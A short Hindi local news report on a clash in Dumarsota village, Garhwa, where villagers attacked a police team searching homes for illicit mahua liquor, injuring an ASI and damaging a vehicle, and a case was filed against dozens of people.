कांडी। गढ़वा। ओपी क्षेत्र के डूमरसोता गांव में पुलिस और ग्रामीणों के बीच हुए झड़प में एएसआई सुरेंद्र दुबे के साथ मारपीट किया गया है। झड़प की सूचना मिलते ही आक्रोशित ग्रामीणों ने पुलिस टीम पर हमला कर दिया। जिसमें पुलिस वाहन छतिग्रस्त हो गया। घटना शनिवार रात करीब आठ बजे की है। इसके बाद किसी तरह सभी पुलिसकर्मियों ने जान बचा कर भागा। भागने के क्रम में पुलिस वाहन से चोट लग कर ग्रामीण योगेंद्र चौधरी गंभीर रूप से घायल हो गया। ग्रामीणों की ओर से हमला के बाद किसी तरह पुलिस टीम वहां से जान बचा कर भागी। पुलिस टीम की ओर से दी गई जानकारी के अनुसार साम करीब सात बजे कुछ लोग इकठ्ठा हो कर शराब पी रहे थे। उन्हीं लोगों में किसी बात को लेकर शोर-शराबा होने लगी। इसकी सूचना एक ग्रामीण ने पुलिस को दिया। पुलिस वहां पहुंच कर मामले की जानकारी लिया तो पता चला कि कुछ लोग दाहसंस्कार से लौट कर शराब पी रहे है। उनको भगाने के बाद टोले पर कई घरों में महुआ शराब बनाने की सूचना मिली। पुलिस जब घरों की तलासी लेना शुरू किया तो इसी क्रम में ग्रामीण उलझ गए। जिसमें एएसआई सुरेंद्र दुबे के साथ मारपीट किया गया।उधर पुलिस घटना को साजिश बता रही है। गौरतलब हो कि डूमरसोता गांव में पहले भी महुआ शराब भट्ठी को बंद कराने को लेकर कई बार पुलिस प्रयास कर चुकी है। उधर उक्त मामले में दस लोगों के खिलाफ नामजद और चालीस-पचास अज्ञात लोगों के खिलाफ मामला दर्ज किया गया है। वरीय पदाधिकारी के निर्देश पर आगे करवाई की जाएगी। वंही इंस्पेक्टर अशोक कुमार सिंह ने जानकारी देते हुए कहा कि मामले की जांच चल रही है ।

84 total views, 3 views today